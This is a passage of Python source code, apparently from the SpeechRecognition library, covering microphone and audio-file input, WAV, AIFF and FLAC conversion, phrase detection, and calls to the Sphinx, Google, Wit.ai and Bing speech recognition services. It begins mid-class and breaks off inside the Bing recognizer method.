def __init__(self, device_index = None, sample_rate = 16000, chunk_size = 1024):
# set up PyAudio
self.pyaudio_module = self.get_pyaudio()
assert device_index is None or isinstance(device_index, int), "Device index must be None or an integer"
if device_index is not None: # ensure device index is in range
audio = self.pyaudio_module.PyAudio()
try:
count = audio.get_device_count() # obtain device count
except:
audio.terminate()
raise
assert 0 <= device_index < count, "Device index out of range ({0} devices available; device index should be between 0 and {1} inclusive)".format(count, count - 1)
assert isinstance(sample_rate, int) and sample_rate > 0, "Sample rate must be a positive integer"
assert isinstance(chunk_size, int) and chunk_size > 0, "Chunk size must be a positive integer"
self.device_index = device_index
self.format = self.pyaudio_module.paInt16 # 16-bit int sampling
self.SAMPLE_WIDTH = self.pyaudio_module.get_sample_size(self.format) # size of each sample
self.SAMPLE_RATE = sample_rate # sampling rate in Hertz
self.CHUNK = chunk_size # number of frames stored in each buffer
self.audio = None
self.stream = None
@staticmethod
def get_pyaudio():
"""
Imports the pyaudio module and checks its version. Throws exceptions if pyaudio can't be found or a wrong version is installed
"""
try:
import pyaudio
except ImportError:
raise AttributeError("Could not find PyAudio; check installation")
from distutils.version import LooseVersion
if LooseVersion(pyaudio.__version__) < LooseVersion("0.2.9"):
raise AttributeError("PyAudio 0.2.9 or later is required (found version {0})".format(pyaudio.__version__))
return pyaudio
@staticmethod
def list_microphone_names():
"""
Returns a list of the names of all available microphones. For microphones where the name can't be retrieved, the list entry contains ``None`` instead.
The index of each microphone's name is the same as its device index when creating a ``Microphone`` instance - indices in this list can be used as values of ``device_index``.
"""
audio = Microphone.get_pyaudio().PyAudio()
try:
result = []
for i in range(audio.get_device_count()):
device_info = audio.get_device_info_by_index(i)
result.append(device_info.get("name"))
finally:
audio.terminate()
return result
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
self.audio = self.pyaudio_module.PyAudio()
try:
self.stream = Microphone.MicrophoneStream(
self.audio.open(
input_device_index = self.device_index, channels = 1,
format = self.format, rate = self.SAMPLE_RATE, frames_per_buffer = self.CHUNK,
input = True, # stream is an input stream
)
)
except:
self.audio.terminate()
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.stream.close()
finally:
self.stream = None
self.audio.terminate()
class MicrophoneStream(object):
def __init__(self, pyaudio_stream):
self.pyaudio_stream = pyaudio_stream
def read(self, size):
return self.pyaudio_stream.read(size, exception_on_overflow = False)
def close(self):
try:
# sometimes, if the stream isn't stopped, closing the stream throws an exception
if not self.pyaudio_stream.is_stopped():
self.pyaudio_stream.stop_stream()
finally:
self.pyaudio_stream.close()
class AudioFile(AudioSource):
"""
Creates a new ``AudioFile`` instance given a WAV/AIFF/FLAC audio file `filename_or_fileobject`. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to an audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar.
Note that functions that read from the audio (such as ``recognizer_instance.record`` or ``recognizer_instance.listen``) will move ahead in the stream. For example, if you execute ``recognizer_instance.record(audiofile_instance, duration=10)`` twice, the first time it will return the first 10 seconds of audio, and the second time it will return the 10 seconds of audio right after that. This is always reset to the beginning when entering an ``AudioFile`` context.
WAV files must be in PCM/LPCM format; WAVE_FORMAT_EXTENSIBLE and compressed WAV are not supported and may result in undefined behaviour.
Both AIFF and AIFF-C (compressed AIFF) formats are supported.
FLAC files must be in native FLAC format; OGG-FLAC is not supported and may result in undefined behaviour.
"""
def __init__(self, filename_or_fileobject):
if str is bytes: # Python 2 - if a file path is specified, it must either be a `str` instance or a `unicode` instance
assert isinstance(filename_or_fileobject, (str, unicode)) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
else: # Python 3 - if a file path is specified, it must be a `str` instance
assert isinstance(filename_or_fileobject, str) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
self.filename_or_fileobject = filename_or_fileobject
self.stream = None
self.DURATION = None
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
try:
# attempt to read the file as WAV
self.audio_reader = wave.open(self.filename_or_fileobject, "rb")
self.little_endian = True # RIFF WAV is a little-endian format (most ``audioop`` operations assume that the frames are stored in little-endian form)
except wave.Error:
try:
# attempt to read the file as AIFF
self.audio_reader = aifc.open(self.filename_or_fileobject, "rb")
self.little_endian = False # AIFF is a big-endian format
except aifc.Error:
# attempt to read the file as FLAC
if hasattr(self.filename_or_fileobject, "read"):
flac_data = self.filename_or_fileobject.read()
else:
with open(self.filename_or_fileobject, "rb") as f: flac_data = f.read()
# run the FLAC converter with the FLAC data to get the AIFF data
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting AIFF file in stdout, and make sure it's not mixed with any program output
"--decode", "--force-aiff-format", # decode the FLAC file into an AIFF file
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
aiff_data, stderr = process.communicate(flac_data)
aiff_file = io.BytesIO(aiff_data)
try:
self.audio_reader = aifc.open(aiff_file, "rb")
except aifc.Error:
assert False, "Audio file could not be read as WAV, AIFF, or FLAC; check if file is corrupted"
self.little_endian = False # AIFF is a big-endian format
assert 1 <= self.audio_reader.getnchannels() <= 2, "Audio must be mono or stereo"
self.SAMPLE_WIDTH = self.audio_reader.getsampwidth()
# 24-bit audio needs some special handling for old Python versions (workaround for https://bugs.python.org/issue12866)
samples_24_bit_pretending_to_be_32_bit = False
if self.SAMPLE_WIDTH == 3: # 24-bit audio
try: audioop.bias(b"", self.SAMPLE_WIDTH, 0) # test whether this sample width is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
samples_24_bit_pretending_to_be_32_bit = True # while the ``AudioFile`` instance will outwardly appear to be 32-bit, it will actually internally be 24-bit
self.SAMPLE_WIDTH = 4 # the ``AudioFile`` instance should present itself as a 32-bit stream now, since we'll be converting into 32-bit on the fly when reading
self.SAMPLE_RATE = self.audio_reader.getframerate()
self.CHUNK = 4096
self.FRAME_COUNT = self.audio_reader.getnframes()
self.DURATION = self.FRAME_COUNT / float(self.SAMPLE_RATE)
self.stream = AudioFile.AudioFileStream(self.audio_reader, self.little_endian, samples_24_bit_pretending_to_be_32_bit)
return self
def __exit__(self, exc_type, exc_value, traceback):
if not hasattr(self.filename_or_fileobject, "read"): # only close the file if it was opened by this class in the first place (if the file was originally given as a path)
self.audio_reader.close()
self.stream = None
self.DURATION = None
class AudioFileStream(object):
def __init__(self, audio_reader, little_endian, samples_24_bit_pretending_to_be_32_bit):
self.audio_reader = audio_reader # an audio file object (e.g., a `wave.Wave_read` instance)
self.little_endian = little_endian # whether the audio data is little-endian (when working with big-endian things, we'll have to convert it to little-endian before we process it)
self.samples_24_bit_pretending_to_be_32_bit = samples_24_bit_pretending_to_be_32_bit # this is true if the audio is 24-bit audio, but 24-bit audio isn't supported, so we have to pretend that this is 32-bit audio and convert it on the fly
def read(self, size = -1):
buffer = self.audio_reader.readframes(self.audio_reader.getnframes() if size == -1 else size)
if not isinstance(buffer, bytes): buffer = b"" # workaround for https://bugs.python.org/issue24608
sample_width = self.audio_reader.getsampwidth()
if not self.little_endian: # big endian format, convert to little endian on the fly
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4 (incidentally, that also means that we don't need to worry about 24-bit audio being unsupported, since Python 3.4+ always has that functionality)
buffer = audioop.byteswap(buffer, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
buffer = buffer[sample_width - 1::-1] + b"".join(buffer[i + sample_width:i:-1] for i in range(sample_width - 1, len(buffer), sample_width))
# workaround for https://bugs.python.org/issue12866
if self.samples_24_bit_pretending_to_be_32_bit: # we need to convert samples from 24-bit to 32-bit before we can process them with ``audioop`` functions
buffer = b"".join("\x00" + buffer[i:i + sample_width] for i in range(0, len(buffer), sample_width)) # since we're in little endian, we prepend a zero byte to each 24-bit sample to get a 32-bit sample
if self.audio_reader.getnchannels() != 1: # stereo audio
buffer = audioop.tomono(buffer, sample_width, 1, 1) # convert stereo audio data to mono
return buffer
class AudioData(object):
def __init__(self, frame_data, sample_rate, sample_width):
assert sample_rate > 0, "Sample rate must be a positive integer"
assert sample_width % 1 == 0 and 1 <= sample_width <= 4, "Sample width must be between 1 and 4 inclusive"
self.frame_data = frame_data
self.sample_rate = sample_rate
self.sample_width = int(sample_width)
def get_raw_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the raw frame data for the audio represented by the ``AudioData`` instance.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `RAW/PCM audio file <https://en.wikipedia.org/wiki/Raw_audio_format>`__.
"""
assert convert_rate is None or convert_rate > 0, "Sample rate to convert to must be a positive integer"
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 4), "Sample width to convert to must be between 1 and 4 inclusive"
raw_data = self.frame_data
# make sure unsigned 8-bit audio (which uses unsigned samples) is handled like higher sample width audio (which uses signed samples)
if self.sample_width == 1:
raw_data = audioop.bias(raw_data, 1, -128) # subtract 128 from every sample to make them act like signed samples
# resample audio at the desired rate if specified
if convert_rate is not None and self.sample_rate != convert_rate:
raw_data, _ = audioop.ratecv(raw_data, self.sample_width, 1, self.sample_rate, convert_rate, None)
# convert samples to desired sample width if specified
if convert_width is not None and self.sample_width != convert_width:
if convert_width == 3: # we're converting the audio into 24-bit (workaround for https://bugs.python.org/issue12866)
raw_data = audioop.lin2lin(raw_data, self.sample_width, 4) # convert audio into 32-bit first, which is always supported
try: audioop.bias(b"", 3, 0) # test whether 24-bit audio is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
raw_data = b"".join(raw_data[i + 1:i + 4] for i in range(0, len(raw_data), 4)) # since we're in little endian, we discard the first byte from each 32-bit sample to get a 24-bit sample
else: # 24-bit audio fully supported, we don't need to shim anything
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
else:
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
# if the output is 8-bit audio with unsigned samples, convert the samples we've been treating as signed to unsigned again
if convert_width == 1:
raw_data = audioop.bias(raw_data, 1, 128) # add 128 to every sample to make them act like unsigned samples again
return raw_data
def get_wav_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the contents of a WAV file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `WAV file <https://en.wikipedia.org/wiki/WAV>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# generate the WAV file contents
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
wav_writer.setframerate(sample_rate)
wav_writer.setsampwidth(sample_width)
wav_writer.setnchannels(1)
wav_writer.writeframes(raw_data)
wav_data = wav_file.getvalue()
finally: # make sure resources are cleaned up
wav_writer.close()
return wav_data
def get_aiff_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the contents of an AIFF-C file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `AIFF-C file <https://en.wikipedia.org/wiki/Audio_Interchange_File_Format>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# the AIFF format is big-endian, so we need to covnert the little-endian raw data to big-endian
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4
raw_data = audioop.byteswap(raw_data, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
raw_data = raw_data[sample_width - 1::-1] + b"".join(raw_data[i + sample_width:i:-1] for i in range(sample_width - 1, len(raw_data), sample_width))
# generate the AIFF-C file contents
with io.BytesIO() as aiff_file:
aiff_writer = aifc.open(aiff_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
aiff_writer.setframerate(sample_rate)
aiff_writer.setsampwidth(sample_width)
aiff_writer.setnchannels(1)
aiff_writer.writeframes(raw_data)
aiff_data = aiff_file.getvalue()
finally: # make sure resources are cleaned up
aiff_writer.close()
return aiff_data
def get_flac_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the contents of a FLAC file containing the audio represented by the ``AudioData`` instance.
Note that 32-bit FLAC is not supported. If the audio data is 32-bit and ``convert_width`` is not specified, then the resulting FLAC will be a 24-bit FLAC.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `FLAC file <https://en.wikipedia.org/wiki/FLAC>`__.
"""
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 3), "Sample width to convert to must be between 1 and 3 inclusive"
if self.sample_width > 3 and convert_width is None: # resulting WAV data would be 32-bit, which is not convertable to FLAC using our encoder
convert_width = 3 # the largest supported sample width is 24-bit, so we'll limit the sample width to that
# run the FLAC converter with the WAV data to get the FLAC data
wav_data = self.get_wav_data(convert_rate, convert_width)
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting FLAC file in stdout, and make sure it's not mixed with any program output
"--best", # highest level of compression available
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
flac_data, stderr = process.communicate(wav_data)
return flac_data
class Recognizer(AudioSource):
def __init__(self):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
"""
self.energy_threshold = 300 # minimum audio energy to consider for recording
self.dynamic_energy_threshold = True
self.dynamic_energy_adjustment_damping = 0.15
self.dynamic_energy_ratio = 1.5
self.pause_threshold = 0.8 # seconds of non-speaking audio before a phrase is considered complete
self.phrase_threshold = 0.3 # minimum seconds of speaking audio before we consider the speaking audio a phrase - values below this are ignored (for filtering out clicks and pops)
self.non_speaking_duration = 0.5 # seconds of non-speaking audio to keep on both sides of the recording
def record(self, source, duration = None, offset = None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) starting at ``offset`` (or at the beginning if not specified) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before recording, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
offset_time = 0
offset_reached = False
while True: # loop for the total number of chunks needed
if offset and not offset_reached:
offset_time += seconds_per_buffer
if offset_time > offset:
offset_reached = True
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
if offset_reached or not offset:
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def adjust_for_ambient_noise(self, source, duration = 1):
"""
Adjusts the energy threshold dynamically using audio from ``source`` (an ``AudioSource`` instance) to account for ambient noise.
Intended to calibrate the energy threshold with the ambient energy level. Should be used on periods of audio without speech - will stop early if any speech is detected.
The ``duration`` parameter is the maximum number of seconds that it will dynamically adjust the threshold for before returning. This value should be at least 0.5 in order to get a representative sample of the ambient noise.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before adjusting, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
# adjust energy threshold until a phrase starts
while True:
elapsed_time += seconds_per_buffer
if elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
# dynamically adjust the energy threshold using assymmetric weighted average
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
def listen(self, source, timeout = None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of non-speaking or there is no more audio input. The ending silence is not included.
The ``timeout`` parameter is the maximum number of seconds that it will wait for a phrase to start before giving up and throwing an ``speech_recognition.WaitTimeoutError`` exception. If ``timeout`` is ``None``, it will wait indefinitely.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before listening, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of non-speaking audio before the phrase is complete
phrase_buffer_count = int(math.ceil(self.phrase_threshold / seconds_per_buffer)) # minimum number of buffers of speaking audio before we consider the speaking audio a phrase
non_speaking_buffer_count = int(math.ceil(self.non_speaking_duration / seconds_per_buffer)) # maximum number of buffers of non-speaking audio to retain before and after
# read audio input for phrases until there is a phrase that is long enough
elapsed_time = 0 # number of seconds of audio read
while True:
frames = collections.deque()
# store audio input until the phrase starts
while True:
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout: # handle timeout if specified
raise WaitTimeoutError("listening timed out")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
if len(frames) > non_speaking_buffer_count: # ensure we only keep the needed amount of non-speaking buffers
frames.popleft()
# detect whether speaking has started on audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold: break
# dynamically adjust the energy threshold using assymmetric weighted average
if self.dynamic_energy_threshold:
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
# read audio input until the phrase ends
pause_count, phrase_count = 0, 0
while True:
elapsed_time += seconds_per_buffer
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
phrase_count += 1
# check if speaking has stopped for longer than the pause threshold on the audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# check how long the detected phrase is, and retry listening if the phrase is too short
phrase_count -= pause_count
if phrase_count >= phrase_buffer_count: break # phrase is long enough, stop listening
# obtain frame data
for i in range(pause_count - non_speaking_buffer_count): frames.pop() # remove extra non-speaking frames at the end
frame_data = b"".join(list(frames))
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def listen_in_background(self, source, callback):
"""
Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase are detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that ``callback`` function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except WaitTimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
def recognize_sphinx(self, audio_data, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using CMU Sphinx.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` or ``"en-GB"``, defaulting to US English. Out of the box, only ``en-US`` is supported. See `Notes on using `PocketSphinx <https://github.com/Uberi/speech_recognition/blob/master/reference/pocketsphinx.rst>`__ for information about installing other languages. This document is also included under ``reference/pocketsphinx.rst``.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the Sphinx ``pocketsphinx.pocketsphinx.Decoder`` object resulting from the recognition.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if there are any issues with the Sphinx installation.
"""
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert isinstance(language, str), "`language` must be a string"
# import the PocketSphinx speech recognition module
try:
from pocketsphinx import pocketsphinx
from sphinxbase import sphinxbase
except ImportError:
raise RequestError("missing PocketSphinx module: ensure that PocketSphinx is set up correctly.")
except ValueError:
raise RequestError("bad PocketSphinx installation detected; make sure you have PocketSphinx version 0.0.9 or better.")
language_directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pocketsphinx-data", language)
if not os.path.isdir(language_directory):
raise RequestError("missing PocketSphinx language data directory: \"{0}\"".format(language_directory))
acoustic_parameters_directory = os.path.join(language_directory, "acoustic-model")
if not os.path.isdir(acoustic_parameters_directory):
raise RequestError("missing PocketSphinx language model parameters directory: \"{0}\"".format(acoustic_parameters_directory))
language_model_file = os.path.join(language_directory, "language-model.lm.bin")
if not os.path.isfile(language_model_file):
raise RequestError("missing PocketSphinx language model file: \"{0}\"".format(language_model_file))
phoneme_dictionary_file = os.path.join(language_directory, "pronounciation-dictionary.dict")
if not os.path.isfile(phoneme_dictionary_file):
raise RequestError("missing PocketSphinx phoneme dictionary file: \"{0}\"".format(phoneme_dictionary_file))
# create decoder object
config = pocketsphinx.Decoder.default_config()
config.set_string("-hmm", acoustic_parameters_directory) # set the path of the hidden Markov model (HMM) parameter files
config.set_string("-lm", language_model_file)
config.set_string("-dict", phoneme_dictionary_file)
config.set_string("-logfn", os.devnull) # disable logging (logging causes unwanted output in terminal)
decoder = pocketsphinx.Decoder(config)
# obtain audio data
raw_data = audio_data.get_raw_data(convert_rate = 16000, convert_width = 2) # the included language models require audio to be 16-bit mono 16 kHz in little-endian format
# obtain recognition results
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
if show_all: return decoder
# return results
hypothesis = decoder.hyp()
if hypothesis is not None: return hypothesis.hypstr
raise UnknownValueError() # no transcriptions available
def recognize_google(self, audio_data, key = None, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
To obtain your own API key, simply following the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert key is None or isinstance(key, str), "`key` must be `None` or a string"
assert isinstance(language, str), "`language` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate = None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width = 2 # audio samples must be 16-bit
)
if key is None: key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"
url = "http://www.google.com/speech-api/v2/recognize?{0}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
request = Request(url, data = flac_data, headers = {"Content-Type": "audio/x-flac; rate={0}".format(audio_data.sample_rate)})
# obtain audio transcription results
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if "alternative" not in actual_result: raise UnknownValueError()
for entry in actual_result["alternative"]:
if "transcript" in entry:
return entry["transcript"]
raise UnknownValueError() # no transcriptions available
def recognize_wit(self, audio_data, key, show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Wit.ai API.
The Wit.ai API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://wit.ai/>`__ and creating an app. You will need to add at least one intent to the app before you can see the API key, though the actual intent settings don't matter.
To get the API key for a Wit.ai app, go to the app's overview page, go to the section titled "Make an API request", and look for something along the lines of ``Authorization: Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX``; ``XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`` is the API key. Wit.ai API keys are 32-character uppercase alphanumeric strings.
The recognition language is configured in the Wit.ai app settings.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://wit.ai/docs/http/20141022#get-intent-via-text-link>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "`key` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate = None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width = 2 # audio samples should be 16-bit
)
url = "https://api.wit.ai/speech?v=20141022"
request = Request(url, data = wav_data, headers = {"Authorization": "Bearer {0}".format(key), "Content-Type": "audio/wav"})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "_text" not in result or result["_text"] is None: raise UnknownValueError()
return result["_text"]
def recognize_bing(self, audio_data, key, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-4-supported-locales>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "`key` must be a string"
assert isinstance(language, str), "`language` must be a string"
access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
allow_caching = True
try:
from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
except ImportError:
try:
from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
except (ImportError, RuntimeError):
expire_time = None # monotonic time not available, don't cache access tokens
allow_caching = False # don't allow caching, since monotonic time isn't available
if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
# get an access token using OAuth
credential_url = "https://oxford-speech.cloudapp.net/token/issueToken"
